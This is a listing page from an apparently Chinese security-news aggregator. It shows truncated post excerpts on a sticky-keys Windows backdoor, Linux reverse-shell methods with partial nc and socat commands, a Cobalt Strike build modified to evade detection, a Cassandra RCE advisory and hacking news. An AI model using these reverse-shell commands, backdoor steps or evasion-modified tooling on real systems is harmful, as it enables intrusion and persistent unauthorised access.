粘滞键后门在windows上连续按5次“Shift”,就可以调出粘滞键。方法一:将C:WindowsSystem32目录下的sethc.exe替换如果目标机是 winvista 以上的,即 winvi...
06月01日43 views评论注册表
程序
Windows操作系统后门
06月01日43 views评论注册表
程序
06月01日43 views评论注册表
程序
百度文库页面保护措施的绕过技术
2023-05-30网友UID(1077232180)提到某Chrome插件,他说可破CSDN、360文库、百度文库。Enable Copy Paste - E...
06月01日安全闲碎29 views评论插件
页面
【漏洞预警】Apache Cassandra 存在越权漏洞导致远程命令执行
漏洞描述:CVE编号: CVE-2023-30601Apache Cassandra 是 Apache 基金会的一个分布式 Nosql 数据库。Apache Cassandra 的受影响版本中,由于没...
06月01日100 views评论audit
权限
e-cology9 changeUserInfo信息泄漏及ofsLogin任意用户登录检测工具
===================================免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负...
06月01日57 views评论id
检测工具
CTF - glibc高版本gdb调试问题
前言由于高版本glibc的调试符号格式有变,导致gdb不能直接加载符号表,需要手动导入高版本的符号表,这里有几种方案。glibc多版本配置方案手动编译(不推荐)glibc的编译需要特定版本的gcc和c...
06月01日329 views1 glibc
符号表
CobaltStrike4.4 狗狗版 修改去特征 附下载链接!!后门自测!!!
狗狗版二开说明 1.去除ListenerConfig中的特征水印2.修改Stager Url校验算法3.修改默认登录int长度48879,让网上的爆破脚本无法爆破4.修改beacon配置信息的默认密钥...
06月01日178 views评论cobaltstrike
teamserver
Linux反弹Shell的一些方法
Netcat目标机:nc -lp [监听端口] -e /bin/bash攻击机:nc [目标IP] [目标监听的端口]Socat目标机:socat TCP-LISTEN:[监听端口号] EXEC:/b...
06月01日35 views评论socket
反弹shell
G.O.S.S.I.P 阅读推荐 2023-05-31 真假人脸
五月的最后一期论文推荐,我们为大家介绍复旦大学和约翰霍普金斯大学的研究人员合作发表、关于人脸识别安全威胁的IEEE S&P 2023论文 Understanding the (In)...
06月01日34 views评论ieee
安全威胁
甲方观点 | 安全众测项目痛点复盘优化
01前言为了全面了解外网资产的安全状况,我们在2022年启动了一项众测工作。自2022年7月份在三家平台发布以来,我们经历了护网、重保等重要活动,并于2023年3月份圆满结束。为了更好地准备下一次众测...
05月31日59 views评论渗透测试
红蓝对抗
18岁黑客入侵博彩网站6万个账户并从中窃取60万美元
关键词黑客入侵一名18岁的威斯康星州男子被指控入侵博彩网站,并从使用该网站的个人账户持有人那里窃取数十万美元。联邦调查局说,这名来自威斯康星州麦迪逊的男子乔斯夫-加里森不仅入侵了数千个个人账户,还出售...
05月31日35 views评论联邦调查局
黑客入侵
北京公交APP惊现诈骗广告,官方回应
关键词诈骗广告图片摄影作者:匡达界面新闻记者 |丁晶晶近日,有网友反映,其在使用北京公交APP时,遇到诈骗广告,该广告伪装成登录入口,十分隐蔽,稍不注意就会被扣29.8元。在时度视频报道中,网友点击进...
05月31日44 views评论北京公交
有限公司
勒索软件团伙使用泄露的勒索软件代码攻击 Windows、Linux 系统
关键词勒索软件一个新的勒索软件操作名为“Bhuti”,使用 LockBit 和 Babuk 勒索软件家族的泄露代码分别针对 Windows 和 Linux 系统进行攻击。虽然 Buhti 背后的威胁行...
05月31日58 views评论lockbit
勒索软件
24857